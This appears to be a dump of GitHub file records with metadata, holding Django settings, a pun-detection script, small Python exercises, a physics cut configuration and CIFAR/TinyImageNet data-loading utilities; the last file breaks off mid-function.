blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6f4797b2cfe1a4f784600f46363ae64503d90490 | f40abc56db1b2c081f25f19101c732d364619832 | /mysite/settings.py | 2ca5f9c5d129019b2e7b2feee4abbcd1bfbec60e | [] | no_license | plaville/my-first-blog | e652545f7cc978db01e5ed0b93f0083b53dc8454 | 67b83813d1174e256514a682c125c725b2d6f566 | refs/heads/master | 2021-04-28T10:20:59.984478 | 2018-02-28T16:48:36 | 2018-02-28T16:48:36 | 122,064,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,207 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mn+@_p#+izajf+iectfcl_roqw7s+t%gs-p5tmqkws)uctz*^a'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'plaville.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Paris'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"laville.pierre@ymail.com"
] | laville.pierre@ymail.com |
adedb1a38e0c33e1ca1211e5434cc9b33cba117b | a540b456d4d452a1be25683b46c8e3e490448cdf | /api_turismo/settings.py | 4421e149e5e4d9b5b51548ca3fde7a9694f7cf64 | [] | no_license | Marcelogreick/api-turismo | db76af2ed576e5b8a0f2b2a7dc30de4415b501cd | b94a09befaba7b482f105cb88647e5f07ebe5d41 | refs/heads/master | 2022-12-17T03:52:00.885739 | 2020-09-25T15:56:25 | 2020-09-25T15:56:25 | 298,617,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,180 | py | """
Django settings for api_turismo project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pf&pgr2&%z-n4rgmgdj$_%-9blfz!r(ui#$cl69(5^0tiqqv7k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'core',
'attractions',
'comment',
'assessments',
'adresses',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api_turismo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api_turismo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"mgreick25@gmail.com"
] | mgreick25@gmail.com |
5ce6da022af74db3e8ba7d1a8ca36fc9ab2385c7 | a601e6b3cf1db0bd96419b7d5668924184352c80 | /Phonetic/Pun_Detection/Pun_Detection.py | 6d062aea56153d042de8eca0b3d04b8df6dfa8b9 | [] | no_license | Parmeetsinghsaluja/Pun-Detection-and-Interpretation | 82da1ec5a7cd62b2b687550c5af9cf961e3eadae | fafd4923180f7acfd10d20ba04e8d6800585668c | refs/heads/master | 2020-03-15T08:04:02.228530 | 2018-05-08T13:58:46 | 2018-05-08T13:58:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,031 | py |
#All imports
from __future__ import print_function
import phrasefinder as pf
import pronouncing as pp
import Levenshtein
import nltk
import glob, os
from nltk.corpus import stopwords
#Function to get frequency of a ngram from large corpus
def main(query, resultdict):
    """Look up *query* in the PhraseFinder n-gram corpus and record its
    total match count in ``resultdict[query]`` (0 on any failure).

    Parameters
    ----------
    query : str
        The n-gram to look up.
    resultdict : dict
        Mutated in place; ``resultdict[query]`` is set to the summed
        match count of the returned phrase(s), or 0 when the request
        fails or returns nothing.
    """
    options = pf.SearchOptions()
    # Only the single best-matching phrase is needed for a frequency lookup.
    options.topk = 1
    try:
        result = pf.search(pf.Corpus.AMERICAN_ENGLISH, query, options)
        if result.status != pf.Status.OK:
            resultdict[query] = 0
            return
        for phrase in result.phrases:
            # Accumulate in case the corpus returns several phrase variants.
            resultdict[query] = resultdict.get(query, 0) + phrase.match_count
        if query not in resultdict:
            # No phrases came back at all: record an explicit zero.
            resultdict[query] = 0
    except Exception:
        # Network/API errors are treated as "never seen" (best-effort lookup).
        resultdict[query] = 0
#Function to get frequency of a ngram based query from large corpus
def new_main(query, resultdict):
    """Run a wildcard PhraseFinder query and store every returned phrase.

    Parameters
    ----------
    query : str
        Query pattern, typically a trigram with one token replaced by ``?``.
    resultdict : dict
        Mutated in place: maps each returned phrase (tokens joined by
        spaces, trailing space included) to its corpus match count.

    Failures (bad status, network errors) leave *resultdict* untouched.
    """
    options = pf.SearchOptions()
    # Fetch up to 30 candidate phrases for the wildcard slot.
    options.topk = 30
    try:
        result = pf.search(pf.Corpus.AMERICAN_ENGLISH, query, options)
        if result.status != pf.Status.OK:
            return
        for phrase in result.phrases:
            # NOTE: the trailing space is intentional -- downstream code was
            # written against keys of the form "tok1 tok2 tok3 " and reuses
            # the key verbatim as a follow-up corpus query.
            skey = " ".join(token.text for token in phrase.tokens) + " "
            resultdict[skey] = phrase.match_count
    except Exception:
        return
#Function for generating ngrams
def ngrams(data, n):
    """Return the list of word-level n-grams of *data*.

    Parameters
    ----------
    data : str
        Input text; tokenised on whitespace.
    n : int
        Size of each n-gram.

    Returns
    -------
    list[str]
        Space-joined n-grams in order of appearance; empty when the text
        has fewer than *n* tokens.
    """
    tokens = data.split()
    # Slide a window of width n over the token list.
    return [' '.join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]
#Function for generating rhyming word of given word
def rhyme(word, level):
    """Return the set of CMU-dictionary words whose final *level* phones
    match those of any recorded pronunciation of *word*."""
    entries = nltk.corpus.cmudict.entries()
    # Every pronunciation the dictionary records for the target word.
    target_prons = [pron for entry_word, pron in entries if entry_word == word]
    matches = set()
    for pron in target_prons:
        tail = pron[-level:]
        # Collect every dictionary word whose pronunciation ends the same way.
        for entry_word, entry_pron in entries:
            if entry_pron[-level:] == tail:
                matches.add(entry_word)
    return matches
#Function to check whether two given word are rhyming of each other
def doTheyRhyme(word1, word2):
    """True when *word1* rhymes with *word2* (shares a final phone in the
    CMU dictionary) or the two spellings are within Levenshtein distance 2."""
    if word1 in rhyme(word2, 1):
        return True
    # Fall back to surface similarity for pairs the rhymer cannot match.
    return Levenshtein.distance(word1, word2) < 3
#Function to calculate Levenshtein Distance
def leven_distance(old_word, new_word):
    """Return a length-normalised similarity ratio between two words.

    Three ratios are computed -- over raw characters, over the space
    separated phonetic (ARPAbet) representation, and over the phonetic
    representation with spaces removed -- and the best one wins.  Each
    ratio is ``(min_len - edit_distance) / min_len``, so 1.0 means
    identical and values can go negative for very different words.

    Returns the maximum ratio when it exceeds 0.3, otherwise the small
    positive sentinel 0.0001 (callers treat anything <= 0.3 as "no
    match" but still expect a non-zero value they can exponentiate).
    """
    # --- 1st technique: plain character-level edit distance --------------
    w_len_ch_old = len(old_word)
    w_len_ch_new = len(new_word)
    # BUGFIX: the original computed min(w_len_ch_old, w_len_ch_old), which
    # ignored the new word's length; normalise by the shorter word.
    w_len_ch = min(w_len_ch_old, w_len_ch_new)
    dis_ch = Levenshtein.distance(old_word, new_word)
    ratio_ch = (w_len_ch - dis_ch) / w_len_ch
    # --- 2nd and 3rd techniques need a phonetic representation -----------
    if len(pp.phones_for_word(old_word)) > 0 and len(pp.phones_for_word(new_word)) > 0:
        # 2nd technique: distance over the space-separated phone string.
        old_word_phs = pp.phones_for_word(old_word)[0]
        new_word_phs = pp.phones_for_word(new_word)[0]
        w_len_phs = min(len(old_word_phs), len(new_word_phs))
        dis_phs = Levenshtein.distance(old_word_phs, new_word_phs)
        ratio_phs = (w_len_phs - dis_phs) / w_len_phs
        # 3rd technique: same comparison with the spaces stripped out.
        old_word_ph = old_word_phs.replace(" ", "")
        new_word_ph = new_word_phs.replace(" ", "")
        w_len_ph = min(len(old_word_ph), len(new_word_ph))
        dis_ph = Levenshtein.distance(old_word_ph, new_word_ph)
        ratio_ph = (w_len_ph - dis_ph) / w_len_ph
    else:
        # No phonetic entry: use a very negative value so the phonetic
        # techniques can never win the max() below.
        ratio_ph = -1000
        ratio_phs = -1000
    ratio = max(ratio_ch, ratio_ph, ratio_phs)
    # Below the 0.3 threshold return a tiny positive sentinel instead of the
    # raw ratio: callers divide by ratio ** n and must never receive zero or
    # a negative number.
    if ratio > 0.3:
        return ratio
    return 0.0001
#Function to calculate score of two trigram
def score_function(new_trigram, old_trigram, old_word, new_word):
    """Score a candidate pun substitution: the corpus-frequency gain of the
    rewritten trigram minus a penalty that grows as the substituted words
    become less similar.  Returns -1 when the words are too dissimilar."""
    similarity = leven_distance(old_word, new_word)
    if similarity <= 0.3:
        return -1
    freqs = dict()
    main(new_trigram, freqs)
    main(old_trigram, freqs)
    # Exponent that sharpens the similarity penalty (1 / similarity ** 10).
    penalty_exponent = 10
    frequency_gain = freqs[new_trigram] - freqs[old_trigram]
    return frequency_gain - 1 / (similarity ** penalty_exponent)
#Function to calculate score of two trigram
def score_pair(new_trigram, old_trigram, old_word, new_word, score_pair_dict):
    """Store the substitution score under the key "old_word new_word" and
    return the (mutated) dictionary for convenience."""
    pair_key = old_word + " " + new_word
    score_pair_dict[pair_key] = score_function(new_trigram, old_trigram, old_word, new_word)
    return score_pair_dict
#Function to detect whether given sentence is pun or not
def detect(query, count, output_dict):
    """Decide whether sentence *query* contains a (heterographic) pun.

    The sentence is windowed into 3- or 4-grams; for each rare n-gram every
    content word is replaced by a wildcard and the corpus is asked for
    frequent alternatives.  A candidate replacement that is itself a content
    word, is not a stopword, and rhymes with (or is spelled close to) the
    original word is scored; a positive best score marks the sentence as a
    pun.  The verdict is written into *output_dict* as
    ``"het_<count>" -> "1"`` (pun) or ``"0"`` (no pun), and *count* is
    printed as a progress indicator.
    """
    # POS tags that count as content words (nouns, adjectives, adverbs,
    # verbs, cardinal numbers).
    POS_Tag_Set = ("NN", "NNS", "JJ", "JJR", "JJS", "RBR", "RB", "RBS",
                   "VB", "VBD", "VBG", "VBN", "VBP", "VBZ", "CD")
    # Hoisted out of the candidate loop: the stopword list never changes.
    english_stopwords = set(stopwords.words('english'))
    query = query.lower()
    # Longer sentences are windowed with 4-grams, very short ones with 3-grams.
    window = 4 if len(query.split()) > 3 else 3
    trigrams = ngrams(query, window)
    score_pair_dict = dict()
    for trigram in trigrams:
        fdict = dict()
        main(trigram, fdict)
        # Common n-grams (corpus frequency > 500) are unlikely pun sites.
        if fdict[trigram] > 500:
            continue
        unigrams = ngrams(trigram, 1)
        # Keep only content words as substitution targets.
        for word, tag in nltk.pos_tag(unigrams):
            if tag not in POS_Tag_Set:
                unigrams.remove(word)
        for unigram in unigrams:
            # Ask the corpus for frequent trigrams with this slot wildcarded.
            query_trigram = trigram.replace(unigram, "?")
            replace_dict = dict()
            new_main(query_trigram, replace_dict)
            new_keyset = set(query_trigram.split())
            for new_trigram in replace_dict:
                # The word(s) that differ between the query pattern and the
                # matched phrase; drop the wildcard and the original word.
                diffset = new_keyset.symmetric_difference(
                    set(new_trigram.lower().split()))
                diffset.discard("?")
                diffset.discard(unigram)
                if not diffset:
                    continue
                # NOTE: if more than one word differs an arbitrary one is
                # picked, matching the original behaviour.
                new_word = list(diffset)[0]
                # BUGFIX: nltk.pos_tag() expects a token list; passing the
                # bare string made it tag the word's individual characters.
                new_word_tag = nltk.pos_tag([new_word])[0][1]
                if (new_word_tag in POS_Tag_Set
                        and new_word not in english_stopwords
                        and doTheyRhyme(unigram, new_word)):
                    # Score the (original, replacement) pair.
                    score_pair_dict = score_pair(new_trigram, trigram,
                                                 unigram, new_word,
                                                 score_pair_dict)
    if score_pair_dict:
        # The best-scoring substitution decides pun / no pun.
        pair = max(score_pair_dict, key=score_pair_dict.get)
        verdict = 1 if score_pair_dict[pair] > 0 else 0
        output_dict.update({"het_" + str(count): str(verdict)})
    else:
        output_dict.update({"het_" + str(count): str(0)})
    print(count)
# ---- Driver: run pun detection over every file in the test directory. ----
test_data_path= input("Enter Path of Test Data :")
output_path= input("Enter Path of Output File:")
os.chdir(test_data_path)
# Iterate over every file in the directory.
# NOTE(review): the pattern "*" matches ALL files, not only .txt files as
# originally intended -- confirm the directory holds nothing else.
for file in glob.glob("*"):
    output_dict = dict()
    # Open the current file; ISO-8859-1 avoids decode errors on raw text.
    with open(file,"r",encoding="ISO-8859-1") as f:
        # Read all sentences up front.
        lines=f.readlines()
        # Sentence ids start at "het_50": count is incremented before the
        # first detect() call below. TODO confirm this offset matches the
        # dataset's numbering.
        count = 49
        # Classify each sentence as pun / not pun.
        for line in lines:
            count = count + 1
            detect(line,count,output_dict)
    # Persist the verdict dict; note the file is rewritten per input file.
    with open(output_path+"/Output.txt","w+") as fu:
        fu.write(str(output_dict))
| [
"saluja.parmeetsingh@gmail.com"
] | saluja.parmeetsingh@gmail.com |
f50f286ed59f3347ee5e05249c8f3bc7ae3887ea | bd75439eee4943da8c1a9e60c5e3c1bfc4caf042 | /config/wsgi.py | c0e63d1e662d612b78aba397891c4f62e4b42ff6 | [
"MIT"
] | permissive | CMCuritiba/wramais | fecaa3d4ee26b7f4295ca169e01d618cd8154486 | b06449a9ab73ac06b13887b95d035f7f59690be8 | refs/heads/master | 2021-06-01T13:50:35.071529 | 2019-05-16T19:16:29 | 2019-05-16T19:16:29 | 95,113,417 | 0 | 0 | null | 2018-04-09T19:05:10 | 2017-06-22T12:30:20 | Python | UTF-8 | Python | false | false | 1,716 | py | """
WSGI config for Chamados CMC project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from django.core.wsgi import get_wsgi_application
#if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
#from raven.contrib.django.raven_compat.middleware.wsgi import Sentry
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
#if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
# application = Sentry(application)
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| [
"alexandre.odoni@cmc.pr.gov.br"
] | alexandre.odoni@cmc.pr.gov.br |
fb82904f1f952f02d718d84fc8f368789d952778 | 58b9c50e3b55f711515e6869d4f1a0b617d1f597 | /Book exercises/Exercise 2. Comments and Pound Characters.py | 31e22ec3fbef91d5956dbf5cbd34b0da147f0f57 | [] | no_license | TomasHalko/pythonSchool | 70e40af08331b35c41df3ae5e1a8455796949faf | 3c298686a80229de41a135e3d7b30052395c3558 | refs/heads/master | 2022-12-19T17:38:45.449001 | 2020-10-07T12:25:42 | 2020-10-07T12:25:42 | 293,471,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # A comment, this is so you can read your program later.
# Anything after the # is ignored by python.
print("I could have code like this.") # and the comment after is ignored
# You can also use a comment to "disable" or comment out code:
# print("This won't run.")
# The line below is ordinary code and does execute.
print("This will run.")
"tomashalko@gmail.com"
] | tomashalko@gmail.com |
0c2f558ec0494841857978e64f4fd0e8c8937538 | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/hr_recruitment/__init__.py | 2283b78b5f3c81ef2cc3a1d49ecbbb3c7b0b0f21 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # -*- encoding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from . import models
| [
"yasir@harpiya.com"
] | yasir@harpiya.com |
3e7ffafa559cd3e859a2316ab5e3ec983d4386e1 | 5fce342c9e598ac7ef2ab06047081db4d6661b9d | /python/abc/template/shakutori/AOJ-CTNW.py | e7f3d988a3186f21805a8c04818c29dceddd6a7c | [] | no_license | kp047i/AtCoder | 679493203023a14a10fca22479dbeae4986d2046 | 276ad0fab8d39d5d9a1251bb2a533834124f3e77 | refs/heads/master | 2022-07-26T21:49:29.490556 | 2020-06-28T14:28:12 | 2020-06-28T14:28:12 | 208,727,698 | 0 | 0 | null | 2022-06-22T02:11:01 | 2019-09-16T06:37:50 | Python | UTF-8 | Python | false | false | 957 | py | n, q = map(int, input().split())
a = list(map(int, input().split()))
x = list(map(int, input().split()))
# Two-pointer ("shakutori") method: for each query x[i], count the
# contiguous subarrays of a whose sum is <= x[i].
# Execute all q queries.
for i in range(q):
    ans = 0
    # Case analysis on the left end of the interval.
    right = 0
    _sum = 0
    for left in range(n):
        # Advance right while a[right] can be added without exceeding x[i].
        while right < n and (_sum + a[right]) <= x[i]:
            _sum += a[right]
            right += 1
        # After the loop, right is the largest valid end, so every interval
        # starting at left and ending before right counts.
        ans += right - left
        # right == left means even the single element a[left] is too large;
        # move right forward together with left.
        if right == left:
            right += 1
        # Otherwise only left advances, so subtract a[left] from the window sum.
        else:
            _sum -= a[left]
    # Total number of valid intervals for this query.
    print(ans)
| [
"takayuki.miura28@gmail.com"
] | takayuki.miura28@gmail.com |
5d46d3160485153a72aeaa43b0d98d716859314c | 5cdd13489c995d825985f8e76fb9641d83675972 | /PlotConfiguration/ISR/2016/fake_estimation/muon/LLSS/cuts.py | 313c13d35f546643f1eed5f28fcb69008150737b | [] | no_license | CMSSNU/MultiUniv | d506cea55b1f57e0694309e04b9584434c859917 | cb72ac8cba215598a0f09a46725123e071f9137f | refs/heads/master | 2020-04-20T06:23:13.425043 | 2020-03-25T08:11:31 | 2020-03-25T08:11:31 | 168,682,069 | 0 | 4 | null | 2020-02-13T10:14:48 | 2019-02-01T10:35:47 | Python | UTF-8 | Python | false | false | 509 | py | from CommonPyTools.python.CommonTools import *
SKFlat_WD = os.getenv('SKFlat_WD')
sys.path.insert(0,SKFlat_WD+'/CommonTools/include')
from Definitions import *
supercut = '1==1'
# for fake estimation
# LL same sign
cuts['detector_level'] = 'is_dimu_tri_passed == 1 && evt_tag_dimuon_rec_Fake == 1 && evt_tag_dielectron_rec_Fake == 0 && evt_tag_analysisevnt_sel_rec_Fake == 1 && dilep_pt_rec_Fake < 100. && dilep_mass_rec_Fake > 40 && evt_tag_oppositecharge_sel_rec_Fake == 0 && evt_tag_LL_rec_Fake == 1 '
| [
"jhkim@cern.ch"
] | jhkim@cern.ch |
21d87b38c81f0c4127ce255756ab74e382f0173e | 73b4befb5e94658f461325fe3e83e05970510c48 | /exercises/week10/exercise_visualization/utils/data_utils.py | bc91cf86460ad3b5d4d17dc7b70875e3a45a1c3e | [] | no_license | tlgjerberg/IN5400 | 9248fad83a79574db5ad604d9f419df807d80790 | 3c081f88f7996d86be873a6828cf78098df836eb | refs/heads/master | 2022-04-19T05:27:24.769356 | 2020-04-12T13:02:54 | 2020-04-12T13:02:54 | 235,559,404 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,147 | py | from __future__ import print_function
from builtins import range
from six.moves import cPickle as pickle
import numpy as np
import os
#from scipy.misc import imread
from PIL import Image
import platform
def load_pickle(f):
    """Unpickle file object *f*, handling the Python 2 / 3 split
    (Python 3 needs latin1 decoding to read Python 2 pickles)."""
    major = platform.python_version_tuple()[0]
    if major == '2':
        return pickle.load(f)
    if major == '3':
        return pickle.load(f, encoding='latin1')
    raise ValueError("invalid python version: {}".format(platform.python_version_tuple()))
def load_CIFAR_batch(filename):
    """Load a single batch of CIFAR-10.

    Parameters
    ----------
    filename : str
        Path to a pickled batch file with keys 'data' (N x 3072 pixel
        rows, channel-major) and 'labels' (N class indices).

    Returns
    -------
    tuple
        (X, Y) where X is a float array of shape (N, 32, 32, 3) and Y is
        an int array of shape (N,).
    """
    with open(filename, 'rb') as f:
        datadict = load_pickle(f)
        X = datadict['data']
        Y = datadict['labels']
        # Generalised from the hard-coded 10000 rows: infer the batch size
        # so partial batches load too.  Rows are CHW; convert to HWC.
        X = X.reshape(-1, 3, 32, 32).transpose(0, 2, 3, 1).astype("float")
        Y = np.array(Y)
        return X, Y
def load_CIFAR10(ROOT):
    """Load all five CIFAR-10 training batches plus the test batch from
    directory *ROOT* and return (Xtrain, ytrain, Xtest, ytest)."""
    train_chunks_X = []
    train_chunks_Y = []
    for batch_idx in range(1, 6):
        batch_path = os.path.join(ROOT, 'data_batch_%d' % (batch_idx, ))
        X, Y = load_CIFAR_batch(batch_path)
        train_chunks_X.append(X)
        train_chunks_Y.append(Y)
    Xtr = np.concatenate(train_chunks_X)
    Ytr = np.concatenate(train_chunks_Y)
    # Drop the per-batch references before loading the test set.
    del X, Y
    Xte, Yte = load_CIFAR_batch(os.path.join(ROOT, 'test_batch'))
    return Xtr, Ytr, Xte, Yte
def get_CIFAR10_data(num_training=49000, num_validation=1000, num_test=1000,
                     subtract_mean=True,
                     cifar10_dir='.data/cifar-10-batches-py'):
    """
    Load the CIFAR-10 dataset from disk and perform preprocessing to prepare
    it for classifiers.

    Parameters
    ----------
    num_training, num_validation, num_test : int
        Sizes of the train / val / test splits; validation is carved off
        the rows immediately after the training range.
    subtract_mean : bool
        If True, subtract the mean training image from every split.
    cifar10_dir : str
        Directory containing the unpacked CIFAR-10 batches.  The default
        preserves the previously hard-coded path; note the leading '.'
        ('.data/...') -- confirm it matches your checkout layout.

    Returns
    -------
    dict
        Keys 'X_train'/'y_train', 'X_val'/'y_val', 'X_test'/'y_test';
        images are float arrays in NCHW layout.
    """
    # Load the raw CIFAR-10 data.
    X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)

    # Subsample the data.
    mask = list(range(num_training, num_training + num_validation))
    X_val = X_train[mask]
    y_val = y_train[mask]
    mask = list(range(num_training))
    X_train = X_train[mask]
    y_train = y_train[mask]
    mask = list(range(num_test))
    X_test = X_test[mask]
    y_test = y_test[mask]

    # Normalize the data: subtract the mean image.
    if subtract_mean:
        mean_image = np.mean(X_train, axis=0)
        X_train -= mean_image
        X_val -= mean_image
        X_test -= mean_image

    # Transpose so that channels come first (N, C, H, W).
    X_train = X_train.transpose(0, 3, 1, 2).copy()
    X_val = X_val.transpose(0, 3, 1, 2).copy()
    X_test = X_test.transpose(0, 3, 1, 2).copy()

    # Package data into a dictionary.
    return {
        'X_train': X_train, 'y_train': y_train,
        'X_val': X_val, 'y_val': y_val,
        'X_test': X_test, 'y_test': y_test,
    }
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
    """
    Load TinyImageNet. Each of TinyImageNet-100-A, TinyImageNet-100-B, and
    TinyImageNet-200 have the same directory structure, so this can be used
    to load any of them.

    Inputs:
    - path: String giving path to the directory to load.
    - dtype: numpy datatype used to load the data.
    - subtract_mean: Whether to subtract the mean training image.

    Returns: A dictionary with the following entries:
    - class_names: A list where class_names[i] is a list of strings giving the
      WordNet names for class i in the loaded dataset.
    - X_train: (N_tr, 3, 64, 64) array of training images
    - y_train: (N_tr,) array of training labels
    - X_val: (N_val, 3, 64, 64) array of validation images
    - y_val: (N_val,) array of validation labels
    - X_test: (N_test, 3, 64, 64) array of testing images.
    - y_test: (N_test,) array of test labels; if test labels are not available
      (such as in student code) then y_test will be None.
    - mean_image: (3, 64, 64) array giving mean training image
    """
    def _imread(img_path):
        # BUGFIX: the original called imread() from scipy.misc, but that
        # import is commented out at the top of this file, so every call
        # raised NameError.  Read through PIL (which this file imports)
        # and return an ndarray, matching scipy.misc.imread's output.
        return np.array(Image.open(img_path))

    # First load wnids (one WordNet id per class).
    with open(os.path.join(path, 'wnids.txt'), 'r') as f:
        wnids = [x.strip() for x in f]

    # Map wnids to integer labels.
    wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}

    # Use words.txt to get human-readable names for each class.
    with open(os.path.join(path, 'words.txt'), 'r') as f:
        wnid_to_words = dict(line.split('\t') for line in f)
        for wnid, words in wnid_to_words.items():
            wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
    class_names = [wnid_to_words[wnid] for wnid in wnids]

    # Next load training data, one class directory at a time.
    X_train = []
    y_train = []
    for i, wnid in enumerate(wnids):
        if (i + 1) % 20 == 0:
            print('loading training data for synset %d / %d'
                  % (i + 1, len(wnids)))
